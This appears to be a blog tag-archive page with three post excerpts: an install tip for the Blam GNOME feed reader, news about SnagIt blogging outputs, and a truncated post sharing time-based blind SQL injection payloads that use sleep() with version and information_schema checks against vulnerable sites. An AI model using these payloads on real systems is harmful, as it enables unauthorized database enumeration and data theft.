Posts

Showing posts with the label simple

Blam a simple feed reader for GNOME

Image
Blam a simple feed reader for GNOME Blam is an application for GNU / Linux designed for the desktop environment GNOME . This is a very simple feed reader with a very simple interface from which we can access our feeds. Blam also allows us to add, delete or edit a feed easily. It also gives us the ability to import OPML feed lists, and export the lists created with the program itself. How to Install Blam in Ubuntu Blam is available  from the official Ubuntu repositories.   $ sudo apt-get install blam

Blogging Software Screenshots with SnagIt Gets Simple

Image
Blogging Software Screenshots with SnagIt Gets Simple Popular screen capture program SnagIt (review) can now also be used as a one-click blog editor. TechSmith today introduced free blogging outputs for SnagIt that makes it extremely easy to add screen captures to your blog posts. You capture any part of the desktop screen with SnagIt and publish that image to WordPress directly from SnagIt without having to save the screen capture to a separate local file. The new blogging accessories arent just for uploading images - they also let you include rich formatted text to your blog posts. Blogging with SnagIt is possible on WordPress, TypePad, LiveJournal and Movable Type blogs. In my test post from SnagIt to WordPress, the software had issues publishing the post but it still uploaded the screen capture to WordPress Images directory and also saved that test post to Drafts. TechSmith Accessories | Video Tutorial

Blind injection exploitation with simple payloads

Blind injection exploitation with simple payloads Pranaam to all bhai ji _/_ Today i am going to share simple Blind SQL Injection payload. These payloads are easy and simple to understand :) For finding database version =================== ------> If database version is above 5 and (select sleep(20)  from  dual  where( SELECT  version() ) like 5% )--+ if vulnerable website database version is 5 or above, database will sleep for 20 seconds and page will respond after 20 seconds. ------> if database version is belove 4 and (select sleep(20)  from  dual  where( SELECT  version() ) like 4% )--+ if vulnerable website database version is 4 or below 5 , page will load after  20 seconds. For finding Table Name ================ ------> Payload is and (select sleep(20) from dual where 5* (SELECT table_name  FROM information_schema.tables WHERE table_name LIKE starting_letters_of_table_name% LIMIT  0 , 1 )=  ) ok, in above payloa...